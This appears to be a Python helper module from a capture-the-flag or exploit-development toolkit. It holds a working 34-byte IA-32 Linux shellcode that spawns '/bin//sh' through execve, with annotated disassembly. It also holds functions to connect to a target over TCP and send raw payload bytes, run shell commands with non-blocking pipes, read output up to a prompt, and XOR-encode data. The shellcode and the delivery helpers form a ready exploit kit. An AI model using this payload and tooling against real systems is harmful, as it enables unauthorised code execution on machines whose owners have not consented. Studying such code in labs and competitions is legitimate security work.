import socket
import subprocess
import os, fcntl
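# Basic IA-32 Linux shellcode, 34 bytes. Decoded from the bytes below it
# appears to be execve("/bin//sh", ["/bin//sh", "-iii"], NULL) via int 0x80:
# xor eax,eax; imul ecx (zeroes edx); push the two strings; build argv on
# the stack; mov al,0xb; int 0x80. Confirm with a disassembler before
# relying on the exact argv layout.
#
# A bytes literal is used so that on Python 3 the bytes >= 0x80 are NOT
# UTF-8 encoded when written to a binary socket/pipe (a str literal would
# turn e.g. \xC0 into two bytes and corrupt the payload). On Python 2,
# b"..." is the same type as "...", so callers are unaffected.
SHELLCODE = (
    b"\x31\xC0\xF7\xE9"                                   # xor eax,eax ; imul ecx
    b"\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3"  # push 0 ; push "//sh" ; push "/bin" ; mov ebx,esp
    b"\x50\x68\x2D\x69\x69\x69\x89\xE6"                   # push 0 ; push "-iii" ; mov esi,esp
    b"\x50\x56\x53\x89\xE1"                               # push 0 ; push esi ; push ebx ; mov ecx,esp
    b"\xB0\x0B\xCD\x80"                                   # mov al,0xb (execve) ; int 0x80
)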
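def tcp(host, mode="r"):
    """Open a TCP connection to *host* and return it wrapped as a file object.

    host: 'hostname:port' (e.g. 'example.com:1337'). The split is on the
          LAST colon, so a bracketed IPv6 literal such as '[::1]:1337' is
          accepted as well.
    mode: passed to socket.makefile(); the default is the same one the
          bare makefile() call used. NOTE(review): on Python 3 the default
          'r' yields a read-only *text* file, so use mode='rwb' to send raw
          bytes such as SHELLCODE. On Python 2 the file object is
          read/write regardless of mode.

    Returns the file object. The file is buffered, so call f.flush() after
    writing to actually push the data onto the wire.

    Raises ValueError when host has no ':port' part or the port is not an
    integer; connection failures propagate as socket.error / OSError.
    """
    hostname, sep, port = host.rpartition(":")
    if not sep:
        raise ValueError("expected 'host:port', got %r" % (host,))
    # create_connection() resolves through getaddrinfo, so IPv6 targets and
    # multi-homed hostnames work, unlike a hard-coded AF_INET socket.
    sock = socket.create_connection((hostname.strip("[]"), int(port)))
    # Only the file object is handed back; it keeps the underlying socket
    # alive until it is closed, exactly as the original makefile() did.
    return sock.makefile(mode)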
def localcmd(cmd):
    """Start *cmd* through the shell and return its three pipes.

    cmd: a shell command line. It runs with shell=True, so redirections,
         pipes and globbing work. SECURITY: only pass trusted, hard-coded
         strings here; anything built from remote or user input would be a
         shell command injection.

    Returns a tuple (stdin, stdout, stderr) of the child's file objects.
    stdout and stderr are switched to non-blocking mode, so reading when
    nothing is pending does not hang. The Popen handle is not returned, so
    the caller cannot wait() on or kill the child.

    Remember that readline() keeps the trailing newline: EOF yields '' and
    an empty line yields '\\n'; rstrip() where needed.
    """
    pipe = subprocess.PIPE
    child = subprocess.Popen(cmd, shell=True, stdin=pipe, stdout=pipe, stderr=pipe)
    for stream in (child.stdout, child.stderr):
        setNonBlocking(stream)
    return child.stdin, child.stdout, child.stderr
def setNonBlocking(fd):
    """Set O_NONBLOCK on *fd* (an int descriptor or any object with fileno()).

    The existing status flags are read first and preserved; only the
    non-blocking bit is added. Returns None. Unix only (uses fcntl).
    """
    current = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, current | os.O_NONBLOCK)
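def readUntil(f, key):
    """Consume *f* one character at a time until *key* has just been read.

    Useful for discarding output up to a prompt, then continuing with
    readline() or formatted I/O. Example: if f contains
    'foo bar baz > quux derp', then
        readUntil(f, ' > ')
        print(f.readline().rstrip().split()[0])
    prints 'quux'.

    f:   file/socket object whose read(1) returns str or bytes.
    key: the marker to search for; must be the same type (str/bytes) as
         what f.read() returns. An empty key returns immediately.

    Returns None. Raises EOFError if the stream ends before *key* is seen
    (the original looped forever here, since read(1) returns '' at EOF and
    the sliding window could then never match).
    """
    # key[:0] is '' or b'' depending on key's type, so the window always
    # concatenates cleanly with what f.read() returns.
    window = key[:0]
    while not window.endswith(key):
        ch = f.read(1)
        if not ch:
            raise EOFError("EOF reached before %r was seen" % (key,))
        # Keep only the last len(key) characters - that is all that can match.
        window = (window + ch)[-len(key):]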
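def xor(key, plain):
    """XOR every character of *plain* with *key*, cycling the key.

    Both arguments are str; output character i is chr(ord(plain[i]) ^
    ord(key[i % len(key)])). A one-character key behaves exactly as the
    original single-byte XOR; a longer key is repeated, so
    xor(key, xor(key, data)) == data.

    Returns '' for empty *plain*. Raises ValueError for an empty key (the
    original failed with a TypeError from ord('')).
    """
    if not key:
        raise ValueError("xor key must not be empty")
    klen = len(key)
    return "".join(chr(ord(c) ^ ord(key[i % klen])) for i, c in enumerate(plain))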